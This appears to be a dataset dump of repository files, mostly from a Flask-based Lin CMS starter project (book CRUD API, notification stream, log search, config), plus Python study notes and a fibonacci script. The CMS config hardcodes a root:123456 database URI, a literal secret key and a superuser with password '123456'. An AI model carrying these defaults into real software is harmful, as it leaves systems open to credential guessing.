"text": "\"\"\"\n :copyright: © 2019 by the Lin team.\n :license: MIT, see LICENSE for more details.\n\"\"\"\n\nfrom datetime import timedelta\n\n# 分页配置\nCOUNT_DEFAULT = 10\nPAGE_DEFAULT = 0\n\n# 令牌配置\nJWT_ACCESS_TOKEN_EXPIRES = timedelta(hours=1)\n\n# 插件模块暂时没有开启,以下配置可忽略\n# plugin config写在字典里面\nBP_URL_PREFIX = '/plugin'\nPLUGIN_PATH = {}\n"
},
{
"alpha_fraction": 0.6111111044883728,
"alphanum_fraction": 0.6111111044883728,
"avg_line_length": 11,
"blob_id": "72c57173ae5fce81f12ddcfae6b2e35024342ff0",
"content_id": "2817530b81c96fe1fea4bef54bd70744db13db3b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 144,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 12,
"path": "/app/api/v1/user.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
"text": "\"\"\"\n Hello \n\n\"\"\"\nfrom lin.redprint import Redprint\n\napi = Redprint('user')\n\n\[email protected]('', methods=['POST'])\ndef get_user():\n return 'user'\n"
},
{
"alpha_fraction": 0.6494325399398804,
"alphanum_fraction": 0.6595208048820496,
"avg_line_length": 20.432432174682617,
"blob_id": "2eb1b302f3b8162828136e0f1beac94c9380c447",
"content_id": "4ebe4aa0283d543b6b36cf00117dc4ae1fae7fc3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 806,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 37,
"path": "/app/app.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
"text": "\"\"\"\n :copyright: © 2019 by the Lin team.\n :license: MIT, see LICENSE for more details.\n\"\"\"\n\nfrom flask import Flask\nfrom flask_cors import CORS\nfrom lin import Lin\n\n\ndef register_blueprints(app):\n from app.api.v1 import create_v1\n from app.api.cms import create_cms\n app.register_blueprint(create_v1(), url_prefix='/v1')\n app.register_blueprint(create_cms(), url_prefix='/cms')\n\n\ndef apply_cors(app):\n CORS(app)\n\n\ndef create_tables(app):\n from lin.db import db\n with app.app_context():\n db.create_all()\n\n\ndef create_app():\n app = Flask(__name__)\n app.config.from_object('app.config.setting')\n app.config.from_object('app.config.secure')\n register_blueprints(app)\n Lin(app)\n apply_cors(app)\n # 创建所有表格\n create_tables(app)\n return app\n"
},
{
"alpha_fraction": 0.6592382788658142,
"alphanum_fraction": 0.6616693735122681,
"avg_line_length": 29.09756088256836,
"blob_id": "7b7b8a9aba34bbb13b601dc9d137f7de643f3ab8",
"content_id": "a289fa05ec63839b87b348a7194a4c8f0b01f6eb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2601,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 82,
"path": "/app/api/cms/notify.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
"text": "\"\"\"\n :copyright: © 2019 by the Lin team.\n :license: MIT, see LICENSE for more details.\n\"\"\"\nimport time\n\nfrom flask import Response, jsonify\nfrom flask_jwt_extended import get_current_user\n\nfrom lin import db\nfrom lin.core import route_meta, Event\nfrom lin.exception import NotFound, Success\nfrom lin.jwt import group_required, admin_required\nfrom lin.redprint import Redprint\nfrom lin.notify import MESSAGE_EVENTS\nfrom lin.sse import sser\nfrom app.validators.forms import EventsForm\n\nnotify_api = Redprint('notify')\n\n\n@notify_api.route('/', methods=['GET'], strict_slashes=False)\n@route_meta(auth='消息推送', module='推送', mount=False)\n@group_required\ndef stream():\n return Response(\n event_stream(),\n mimetype=\"text/event-stream\",\n headers=[('Cache-Control', 'no-cache'), ('Connection', 'keep-alive')]\n )\n\n\n@notify_api.route('/events', methods=['GET'])\n@route_meta(auth='获得events', module='推送', mount=False)\n@group_required\ndef get_events():\n current_user = get_current_user()\n if current_user.is_super:\n return jsonify({'events': list(MESSAGE_EVENTS)})\n event = Event.query.filter_by(group_id=current_user.group_id, soft=False).first()\n if event is None:\n raise NotFound(msg='当前用户没有推送项')\n events = event.message_events.split(',')\n return jsonify({'events': events})\n\n\n@notify_api.route('/events', methods=['POST'])\n@route_meta(auth='创建events', module='推送', mount=False)\n@admin_required\ndef create_events():\n form = EventsForm().validate_for_api()\n event = Event.query.filter_by(group_id=form.group_id.data, soft=False).first()\n if event:\n raise NotFound(msg='当前权限组已存在推送项')\n with db.auto_commit():\n ev = Event()\n ev.group_id = form.group_id.data\n ev.message_events = ','.join(form.events.data)\n return Success(msg='创建成功')\n\n\n@notify_api.route('/events', methods=['PUT'])\n@route_meta(auth='更新events', module='推送', mount=False)\n@admin_required\ndef put_events():\n form = EventsForm().validate_for_api()\n event = Event.query.filter_by(group_id=form.group_id.data, soft=False).first()\n if event is None:\n raise NotFound(msg='当前权限组不存在推送项')\n with db.auto_commit():\n event.message_events = ','.join(form.events.data)\n return Success(msg='更新成功')\n\n\ndef event_stream():\n while True:\n if sser.exit_message():\n yield sser.pop()\n else:\n yield sser.heartbeat()\n # 每个5秒发送一次心跳\n time.sleep(5)\n"
},
{
"alpha_fraction": 0.65457683801651,
"alphanum_fraction": 0.6566494107246399,
"avg_line_length": 29.473684310913086,
"blob_id": "92304c0acd26b927f024ecf275e73c61df476c3e",
"content_id": "46bdddb27983e6e1cc244c90670f8883ed398a72",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3350,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 95,
"path": "/app/api/v1/book.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
"text": "\"\"\"\n a standard CRUD template of book\n 通过 图书 来实现一套标准的 CRUD 功能,供学习\n :copyright: © 2019 by the Lin team.\n :license: MIT, see LICENSE for more details.\n\"\"\"\nfrom lin import db, route_meta, group_required\nfrom lin.redprint import Redprint\nfrom flask import jsonify\nfrom lin.exception import NotFound, ParameterException, Success\n\nfrom app.libs.error_code import BookNotFound\nfrom app.models.book import Book\nfrom app.validators.forms import BookSearchForm, CreateOrUpdateBookForm\n\napi = Redprint('book')\n\n\[email protected]('/<id>', methods=['GET'])\ndef get_book(id):\n book = Book.query.filter_by(id=id).first() # 通过Book模型在数据库中查询id=`id`的书籍\n if book is None:\n raise NotFound(msg='没有找到相关书籍') # 如果书籍不存在,返回一个异常给前端\n return jsonify(book) # 如果存在,返回该数据的信息\n\n\[email protected]('/', methods=['GET'])\ndef get_books():\n books = Book.query.filter_by(delete_time=None).all()\n if books is None or len(books) < 1:\n raise NotFound(msg='没有找到相关书籍')\n return jsonify(books)\n\n\[email protected]('/search', methods=['GET'])\ndef search():\n form = BookSearchForm().validate_for_api()\n q = '%' + form.q.data + '%'\n books = Book.query.filter(Book.title.like(q)).all()\n if books is None or len(books) < 1:\n raise BookNotFound()\n return jsonify(books)\n\n\[email protected]('/', methods=['POST'])\ndef create_book():\n form = CreateOrUpdateBookForm().validate_for_api() # 校验参数\n book = Book.query.filter_by(title=form.title.data).filter(Book.delete_time == None).first() # 避免同名图书\n if book is not None:\n raise ParameterException(msg='图书已存在')\n # 新增图书\n with db.auto_commit():\n new_book = Book()\n new_book.title = form.title.data\n new_book.author = form.author.data\n new_book.summary = form.summary.data\n new_book.image = form.image.data\n db.session.add(new_book)\n return Success(msg='新建图书成功')\n\n\[email protected]('/<id>', methods=['PUT'])\n@route_meta(auth='更新图书', module='图书')\n@group_required\ndef update_book(id):\n form = CreateOrUpdateBookForm().validate_for_api() # 校验参数\n book = Book.query.filter_by(id=id).first() # 通过Book模型在数据库中查询id=`id`的书籍\n if book is None:\n raise NotFound(msg='没有找到相关书籍') # 如果书籍不存在,返回一个异常给前端\n # 更新图书\n with db.auto_commit():\n book.title = form.title.data\n book.author = form.author.data\n book.summary = form.summary.data\n book.image = form.image.data\n return Success(msg='更新图书成功')\n\n\[email protected]('/<id>', methods=['DELETE'])\n@route_meta(auth='删除图书', module='图书')\n@group_required\ndef delete_book(id):\n book = Book.query.filter_by(id=id).first() # 通过Book模型在数据库中查询id=`id`的书籍\n if book is None:\n raise NotFound(msg='没有找到相关书籍') # 如果书籍不存在,返回一个异常给前端\n # 删除图书,软删除\n book.delete(commit=True)\n return Success(msg='删除图书成功')\n\n\[email protected]('/<id>', methods=['GET'])\n@route_meta(auth='图书详情', module='图书')\n@group_required\ndef get_one_book(id):\n pass\n"
},
{
"alpha_fraction": 0.6558139324188232,
"alphanum_fraction": 0.6883720755577087,
"avg_line_length": 27.66666603088379,
"blob_id": "c3737cb3250d7f18177733fd7b3b62ce84a1aeb2",
"content_id": "44b5f5957f7d8256cc4b6d1ea92ba366e7491127",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 435,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 15,
"path": "/app/models/book.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
"text": "\"\"\"\n :copyright: © 2019 by the Lin team.\n :license: MIT, see LICENSE for more details.\n\"\"\"\nfrom sqlalchemy import Column, String, Integer\n\nfrom lin.interface import InfoCrud as Base\n\n\nclass Book(Base):\n id = Column(Integer, primary_key=True, autoincrement=True)\n title = Column(String(50), nullable=False)\n author = Column(String(30), default='未名')\n summary = Column(String(1000))\n image = Column(String(50))\n"
},
{
"alpha_fraction": 0.5762004256248474,
"alphanum_fraction": 0.5908141732215881,
"avg_line_length": 22.950000762939453,
"blob_id": "dfab532effa23199d723169b8b975098e0f123cf",
"content_id": "64fa9de99cb72d022d03b72a6f33fdabca3e4409",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 530,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 20,
"path": "/add_super.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
"text": "\"\"\"\n :copyright: © 2019 by the Lin team.\n :license: MIT, see LICENSE for more details.\n\"\"\"\n\nfrom app.app import create_app\nfrom lin.db import db\nfrom lin.core import User\n\napp = create_app()\nwith app.app_context():\n with db.auto_commit():\n # 创建一个超级管理员\n user = User()\n user.nickname = 'super'\n user.password = '123456'\n user.email = '[email protected]'\n # super为 2 的时候为超级管理员,普通用户为 1\n user.super = 2\n db.session.add(user)\n"
},
{
"alpha_fraction": 0.6091954112052917,
"alphanum_fraction": 0.6551724076271057,
"avg_line_length": 20.75,
"blob_id": "a47ee4877584282ffc73d73cad5598adf86d45c7",
"content_id": "510abda39dfb0df483e3ff0a9c7e87d63ba69a5e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 304,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 12,
"path": "/app/libs/error_code.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
"text": "\"\"\"\n :copyright: © 2019 by the Lin team.\n :license: MIT, see LICENSE for more details.\n\"\"\"\n\nfrom lin.exception import APIException\n\n\nclass BookNotFound(APIException):\n code = 404 # http状态码\n msg = '没有找到相关图书' # 异常信息\n error_code = 80010 # 约定的异常码\n"
},
{
"alpha_fraction": 0.5846560597419739,
"alphanum_fraction": 0.6164020895957947,
"avg_line_length": 21.235294342041016,
"blob_id": "0ed6946da142d4a601911977793e9ade31229fb4",
"content_id": "4ade9dfef2146e6745c65390691e0c243678e891",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 379,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 17,
"path": "/app/api/v1/__init__.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
"text": "\"\"\"\n :copyright: © 2019 by the Lin team.\n :license: MIT, see LICENSE for more details.\n\"\"\"\n\nfrom flask import Blueprint\nfrom app.api.v1 import book, user\n\n\ndef create_v1():\n bp_v1 = Blueprint('v1', __name__)\n reds = [book, user]\n for red in reds:\n red.api.register(bp_v1)\n # book.book_api.register(bp_v1)\n # user.api.register(bp_v1)\n return bp_v1\n"
},
{
"alpha_fraction": 0.6541054844856262,
"alphanum_fraction": 0.657278835773468,
"avg_line_length": 32.61333465576172,
"blob_id": "2cc2de5d98fa425dc138605bf76d8a58110099ad",
"content_id": "812858267b7824c116a2ae5d437c34eddd0ef4a9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2694,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 75,
"path": "/app/api/cms/log.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
"text": "\"\"\"\n :copyright: © 2019 by the Lin team.\n :license: MIT, see LICENSE for more details.\n\"\"\"\n\nfrom flask import request, jsonify\nfrom sqlalchemy import text\nfrom lin.redprint import Redprint\nfrom lin.jwt import group_required\nfrom lin.exception import NotFound, ParameterException\nfrom lin.db import db\nfrom lin.util import paginate\nfrom lin.core import Log, route_meta\nfrom app.validators.forms import LogFindForm\n\nlog_api = Redprint('log')\n\n\n# 日志浏览(人员,时间),分页展示\n@log_api.route('/', methods=['GET'], strict_slashes=False)\n@route_meta(auth='查询所有日志', module='日志')\n@group_required\ndef get_logs():\n form = LogFindForm().validate_for_api()\n start, count = paginate()\n logs = db.session.query(Log).filter()\n if form.name.data:\n logs = logs.filter(Log.user_name == form.name.data)\n if form.start.data and form.end.data:\n logs = logs.filter(Log.time.between(form.start.data, form.end.data))\n total_nums = logs.count()\n logs = logs.order_by(text('time desc')).offset(start).limit(count).all()\n if logs is None or len(logs) < 1:\n raise NotFound(msg='没有找到相关日志')\n return jsonify({\n \"total_nums\": total_nums,\n \"collection\": logs\n })\n\n\n# 日志搜素(人员,时间)(内容), 分页展示\n@log_api.route('/search', methods=['GET'])\n@route_meta(auth='搜索日志', module='日志')\n@group_required\ndef get_user_logs():\n keyword = request.args.get('keyword', default=None, type=str)\n if keyword is None or '':\n raise ParameterException(msg='搜索关键字不可为空')\n start, count = paginate()\n form = LogFindForm().validate_for_api()\n logs = db.session.query(Log).filter(Log.message.like(f'%{keyword}%'))\n if form.name.data:\n logs = logs.filter(Log.user_name == form.name.data)\n if form.start.data and form.end.data:\n logs = logs.filter(Log._time.between(form.start.data, form.end.data))\n total_nums = logs.count()\n logs = logs.order_by(text('time desc')).offset(start).limit(count).all()\n if logs is None or len(logs) < 1:\n raise NotFound(msg='没有找到相关日志')\n return jsonify({\n \"total_nums\": total_nums,\n \"collection\": logs\n })\n\n\n@log_api.route('/users', methods=['GET'])\n@route_meta(auth='查询日志记录的用户', module='日志')\n@group_required\ndef get_users():\n start, count = paginate()\n user_names = db.session.query(Log.user_name).filter_by(soft=False) \\\n .group_by(text('user_name')).having(text('count(user_name) > 0')).offset(start) \\\n .limit(count).all()\n res = [user_name[0] for user_name in user_names]\n return jsonify(res)\n"
},
{
"alpha_fraction": 0.6019417643547058,
"alphanum_fraction": 0.6699029207229614,
"avg_line_length": 21.88888931274414,
"blob_id": "28c9d7d3d117999086a99bb13ebc2b9c1ea1554c",
"content_id": "a44a3554058b29d6c11e5bc690b1844179b1f4d5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 217,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 9,
"path": "/app/config/secure.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
"text": "\"\"\"\n :copyright: © 2019 by the Lin team.\n :license: MIT, see LICENSE for more details.\n\"\"\"\n\n# 安全性配置\nSQLALCHEMY_DATABASE_URI = 'mysql+cymysql://root:123456@localhost:3306/lin-cms'\n\nSECRET_KEY = '\\x88W\\xf09\\x91\\x07\\x98\\x89\\x87\\x96\\xa0A\\xc68\\xf9\\xecJJU\\x17\\xc5V\\xbe\\x8b\\xef\\xd7\\xd8\\xd3\\xe6\\x95*4'\n"
}
] | 11 |
c11cc/learning-process-record | https://github.com/c11cc/learning-process-record | e317d4e088e89745e0f06902b97fa481cb635ac4 | 6390eb42c5258c1bcb918f4c9ee4883d54c0da92 | 802323ac14113c63ff2f20f9db3fc655a146d583 | refs/heads/master | 2020-05-30T23:37:25.292676 | 2020-04-22T06:40:27 | 2020-04-22T06:40:27 | 190,020,195 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4611596465110779,
"alphanum_fraction": 0.5008736848831177,
"avg_line_length": 17.192073822021484,
"blob_id": "b1c539498cea5e35527cfd33782377feaaeae960",
"content_id": "f2707032e6466aafe4675028f18a82f70a35f561",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6295,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 328,
"path": "/python.md",
"repo_name": "c11cc/learning-process-record",
"src_encoding": "UTF-8",
"text": "### install python \r\n```\r\n./configure\r\nmake\r\nmake install\r\n```\r\n* environment<br>\r\n`export PATH=\"$PATH:/usr/local/bin/python\"`\r\n\r\n* install pythonwin<br> \r\n` pip install pywin32 `\r\n* with source<br>\r\n`pip install -i https://pypi.tuna.tsinghua.edu.cn/simple/ pywin32`\r\n\r\n* upgrade pip<br>\r\n` python -m pip install --upgrade.pip `\r\n\r\n* start coding <br>\r\n`#_*_coding:utf-8 _*_`\r\n* or<br>\r\n`#_*_coding:unicode _*_`\r\n\r\n* note<br>\r\n`start with #, or ''' for multilines.`\r\n\r\n### string <br>\r\n`\\: escape character `\r\n* r/R:<br>\r\n```\r\n>>>print(\"this is the first line with\\n\")\r\nthis is the first line with\r\n>>>print(r\"this is the second line with\\n\")\r\nthis is the second line with\\n\r\n```\r\n\r\n\r\n### number<br>\r\n```\r\n>>>a,b,c,d=1,1.1,true,1+1j\r\nTraceback (most recent call last):\r\n File \"<pyshell#6>\", line 1, in <module>\r\n a,b,c,d=1,1.1,true,1+1j\r\nNameError: name 'true' is not defined\r\n>>>a,b,c,d=1,1.1,True,1+1j\r\n>>>print(type(a,b,c,d))\r\nTraceback (most recent call last):\r\n File \"<pyshell#1>\", line 1, in <module>\r\n print(type(a,b,c,d))\r\nTypeError: type() takes 1 or 3 arguments\r\n>>>print(type(a),type(b),type(c),type(d))\r\n<class 'int'> <class 'float'> <class 'bool'> <class 'complex'>\r\n```\r\n\r\n### string<br>\r\n```\r\n>>>e,f=\"hello\",'hello'\r\n>>>e,f\r\n('hello','hello')\r\n>>>len(f)\r\n5\r\n>>> type(f)\r\n<class 'str'>\r\n```\r\n\r\n### list<br>\r\n```\r\n>>> a=[\"I\",\"like\",'that','boy','\\n']\r\n>>> a\r\n['I', 'like', 'that', 'boy', '\\n']\r\n>>> type(a)\r\n<type 'list'>\r\n>>> print(a)\r\n['I', 'like', 'that', 'boy', '\\n']\r\n>>> a +['very much']\r\n['I', 'like', 'that', 'boy', '\\n', 'very much']\r\n>>> a[4]=[] #list can be edited\r\n>>> a\r\n['I', 'like', 'that', 'boy', []]\r\n>>> a[4]=''\r\n>>> a\r\n['I', 'like', 'that', 'boy', '']\r\n>>> a=[\"I\",\"like\",'that','boy','\\n']\r\n>>> a.remove(\"\\n\")\r\n>>> a\r\n['I', 'like', 'that', 'boy']\r\n>>> a.append(\"very much\")\r\n>>> a\r\n['I', 'like', 'that', 'boy', 'very much']\r\n>>> a.extend(\"very muach\")\r\n>>> a\r\n['I', 'like', 'that', 'boy', 'very much', 'v', 'e', 'r', 'y', ' ', 'm', 'u', 'a', 'c', 'h']\r\n>>> a.pop(len(a)-1)\r\n'h'\r\n>>>del a[5:len(a)]\r\n>>> a\r\n['I', 'like', 'that', 'boy', 'very much']\r\n>>> b=a[1:5]\r\n>>> b\r\n['like', 'that', 'boy', 'very much']\r\n>>> b.reverse()\r\n>>> b\r\n['very much', 'boy', 'that', 'like']\r\n>>> b.append('I')\r\n>>> b\r\n['very much', 'boy', 'that', 'like', 'I']\r\n>>> b.reverse()\r\n>>> b\r\n['I', 'like', 'that', 'boy', 'very much']\r\n>>> b.sort()\r\n>>> b\r\n['I', 'boy', 'like', 'that', 'very much']\r\n>>> b.copy()\r\n['I', 'boy', 'like', 'that', 'very much']\r\n>>> b[:]\r\n['I', 'boy', 'like', 'that', 'very much']\r\n>>> b.clear()\r\n>>> b\r\n[]\r\n```\r\n\r\n### Tuple\r\n```\r\n>>> b=(\"i\",'like','that','boy','\\n')\r\n>>> b\r\n('i', 'like', 'that', 'boy', '\\n')\r\n>>> b[4]\r\n'\\n'\r\n>>> print(b,type(b),len(b))\r\n('i', 'like', 'that', 'boy', '\\n') <class 'tuple'> 5\r\n>>> b[4]=() #Tuple cannot be edited\r\nTraceback (most recent call last):\r\n File \"<pyshell#16>\", line 1, in <module>\r\n b[4]=()\r\nTypeError: 'tuple' object does not support item assignment\r\n>>> b[4]=[]\r\nTraceback (most recent call last):\r\n File \"<pyshell#17>\", line 1, in <module>\r\n b[4]=[]\r\nTypeError: 'tuple' object does not support item assignment\r\n>>> c=('one')\r\n>>> print(b+c)\r\nTraceback (most recent call last):\r\n File \"<pyshell#24>\", line 1, in <module>\r\n 
print(b+c)\r\nTypeError: can only concatenate tuple (not \"str\") to tuple\r\n>>> b=('one','boy')\r\n>>> c=('one','man')\r\n>>> b+c\r\n('one', 'boy', 'one', 'man')\r\n>>> bb=('becomes',)\r\n>>> b+bb\r\n('one', 'boy', 'becomes')\r\n>>> b+bb+c\r\n('one', 'boy', 'becomes', 'one', 'man')\r\n>>> bc=('become')\r\n>>> print(type(bb),type(bc))\r\n<class 'tuple'> <class 'str'>\r\n>>> d,e=('i','have'),('tried','this')\r\n>>> d+e\r\n('i', 'have', 'tried', 'this')\r\n>>> a=['A','B','C']\r\n>>> b=tuple(a)\r\n>>> print(type(a),type(b))\r\n<class 'list'> <class 'tuple'>\r\n>>> a\r\n['A', 'B', 'C']\r\n>>> b\r\n('A', 'B', 'C') \r\n```\r\n\r\n\r\n### set,like hash key in perl\r\n```\r\n>>> student={'Tom','Jerry','Fred','Jerry'}\r\n>>> student\r\n{'Fred', 'Tom', 'Jerry'}\r\n>>> 'Tom' in student #like exists in perl\r\nTrue\r\n>>> teacher=set('ABCD')\r\n>>> teacher\r\n{'A', 'B', 'D', 'C'}\r\n>>> leader=set('CDEF')\r\n>>> teacher-leader\r\n{'A', 'B'}\r\n>>> teacher|leader\r\n{'D', 'F', 'A', 'B', 'E', 'C'}\r\n>>> teacher&leader\r\n{'D', 'C'}\r\n>>> teacher^leader\r\n{'F', 'A', 'B', 'E'}\r\n```\r\n\r\n### dictionary, like hash in perl\r\n```\r\n>>> hash={'Tom':'A','Jerry':'B'}# declare method1 \r\n>>> hash\r\n{'Tom': 'A', 'Jerry': 'B'}\r\n>>> hash['Tom']\r\n'A'\r\n>>> hash['Kim']='A'\r\n>>> hash\r\n{'Tom': 'A', 'Jerry': 'B', 'Kim': 'A'}\r\n>>> del hash['Jerry']\r\n>>> hash\r\n{'Tom': 'A', 'Kim': 'A'}\r\n>>> hash.keys()\r\ndict_keys(['Tom', 'Kim'])\r\n>>> hash.values()\r\ndict_values(['A', 'A'])\r\n>>> sorted(hash.keys)\r\nTraceback (most recent call last):\r\n File \"<pyshell#64>\", line 1, in <module>\r\n sorted(hash.keys)\r\nTypeError: 'builtin_function_or_method' object is not iterable\r\n>>> sorted(hash.keys())\r\n['Kim', 'Tom']\r\n>>> hashn=dict([('Tom','A'),('Jerry','B'),('Kim','A')])#declare method2\r\n>>> hashn\r\n{'Tom': 'A', 'Jerry': 'B', 'Kim': 'A'}\r\n>>> hashm=dict(Tom=A,Jerry=B,Kim=A)\r\nTraceback (most recent call last):\r\n File \"<pyshell#71>\", line 1, in <module>\r\n hashm=dict(Tom=A,Jerry=B,Kim=A)\r\nNameError: name 'A' is not defined\r\n>>> hashm=dict(Tom='A',Jerry='B',Kim='A')#declare method3\r\n>>> hashm\r\n{'Tom': 'A', 'Jerry': 'B', 'Kim': 'A'}\r\n```\r\n\r\n### calculation\r\n```\r\n>>> 5+4\r\n9\r\n>>> 5-4\r\n1\r\n>>> 5/4\r\n1.25\r\n>>> 5*4\r\n20\r\n>>> 5//4\r\n1\r\n>>> 5%4\r\n1\r\n>>> 6%4\r\n2\r\n>>> 5^4\r\n1\r\n>>> 2**5\r\n32\r\n>>> 4/2\r\n2.0\r\n>>> 4//2\r\n2\r\n>>> pow(27,1/3)\r\n3.0\r\n>>> pow(8,1/3)\r\n2.0\r\n>>> pow(-2,1/2)\r\n(8.659560562354934e-17+1.4142135623730951j)\r\n>>> import cmath\r\n>>> cmath.sqrt(5)\r\n(2.23606797749979+0j)\r\n>>> cmath.sqrt(-1)\r\n1j\r\n>>> cmath.sqrt(-5)\r\n2.23606797749979j\r\n>>> pow(-5,1/2)\r\n(1.3691967456605067e-16+2.23606797749979j) \r\n```\r\n\r\n### string and operator\r\n```\r\n>>>print (\"str\"+'ing','operator'*2)\r\nstring operatoroperator\r\n>>>e,f=\"hello\",'hello'\r\n>>> print (e[0]+e[3])\r\nhl\r\n>>> print(e[0:3])\r\nhel\r\n>>> print(e[-1:-3])\r\n\r\n>>> print(e[-3:-1])\r\nll \r\n>>> print(e[-5:-3])\r\nhe\r\n```\r\n\r\n### working in shell\r\n```\r\n>>> b=0\r\n>>> while(b<9):\r\n\tprint(b)\r\n\tb=b+1\r\n\r\n\t\r\n0\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n\r\n>>> if(b<10):\r\n\tprint(b)\r\n\r\n\t\r\n9\r\n>>> if(b<10)\r\nSyntaxError: invalid syntax\r\n\r\n\r\n#for\r\n>>> for i in range(5,9):\r\n\tprint(i)\r\n\r\n\t\r\n5\r\n6\r\n7\r\n8\r\n```\r\n\r\n* break, perl last\r\n* countinue, perl next\r\n* pass, do nothing waiting for crtl+C;\r\n"
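* a quick shell check of break and continue (range(5,9) as above; 6 is skipped, 8 stops the loop):\r\n```\r\n>>> for i in range(5,9):\r\n\tif i == 6:\r\n\t\tcontinue\r\n\tif i == 8:\r\n\t\tbreak\r\n\tprint(i)\r\n\r\n\t\r\n5\r\n7\r\n```\r\n"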
},
{
"alpha_fraction": 0.8214285969734192,
"alphanum_fraction": 0.8214285969734192,
"avg_line_length": 13,
"blob_id": "177828c3c9d6d1d55fa6adaf89a5889f5ac070f1",
"content_id": "269a9418677f4b07420cd76d1c7f5d6affe28d39",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 28,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 2,
"path": "/README.md",
"repo_name": "c11cc/learning-process-record",
"src_encoding": "UTF-8",
"text": "# learning\nlearning process\n"
},
{
"alpha_fraction": 0.5954545736312866,
"alphanum_fraction": 0.6318181753158569,
"avg_line_length": 20.200000762939453,
"blob_id": "da4d2362a33141ea10617830bdf10b5aae48ec8a",
"content_id": "6fae58e1145b08a674160a9e63c989a74ab4f3da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 220,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 10,
"path": "/fibonacci_number.py",
"repo_name": "c11cc/learning-process-record",
"src_encoding": "UTF-8",
"text": "# print 10 fibonacci number\r\n# define before calling, this is different from Perl\r\n\r\ndef calculation(m,n,counts):\r\n while(counts<10):\r\n counts+=1\r\n m,n=n,m+n\r\n print(\"%d:%d\" %(counts,m))\r\n \r\ncalculation(0,1,0)"
}
] | 3 |
peterbarla/AlgoExpertExercises | https://github.com/peterbarla/AlgoExpertExercises | 8352d77f617a630b0df430cf41e14a97c55a9c7c | d5fc366593185169e0ad8fe2739d85ef5ff6cb5c | 971ac46f7565277358b3597fb9b2157cf9d1ed58 | refs/heads/master | 2023-02-18T23:05:53.012687 | 2021-01-21T22:43:34 | 2021-01-21T22:43:34 | 286,207,976 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6157462000846863,
"alphanum_fraction": 0.640423059463501,
"avg_line_length": 34.5,
"blob_id": "87d83b347cae151b79814f67587ab1c292e70f3d",
"content_id": "ddbe1dac73040d196ec3f4d885612690f9544cbb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 851,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 24,
"path": "/DynamicProgramming/MaxProfitWithKTransactions/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(nk) time | O(n) space where n is the length of prices and k is the number of transactions\ndef maxProfitWithKTransactions(prices, k):\n if k < 1 or len(prices) < 2: return 0\n firstRow = [0 for i in range(len(prices))]\n secondRow = []\n for _ in range(k):\n secondRow = [0 for k in range(len(prices))]\n for j in range(1, len(prices)):\n maxProfitWithLessTransactions = getMaxProfit(firstRow, prices, j)\n secondRow[j] = max(secondRow[j - 1], prices[j] + maxProfitWithLessTransactions)\n firstRow = secondRow[0:]\n\n return secondRow[-1]\n\ndef getMaxProfit(firstRow, prices, j):\n maxProfit = float('-inf')\n for i in range(0, j):\n maxProfit = max(maxProfit, firstRow[i] - prices[i])\n return maxProfit\n\nprices = [5, 11, 3, 50, 60, 90]\nk = 2\n\nprint(maxProfitWithKTransactions(prices, k))"
},
{
"alpha_fraction": 0.5841924548149109,
"alphanum_fraction": 0.5979381203651428,
"avg_line_length": 21.461538314819336,
"blob_id": "0effbc86e3619fb90242208d03e81b55754edf78",
"content_id": "0bb910af25bae0f67b7effef5b3bb63c6c0489a7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 291,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 13,
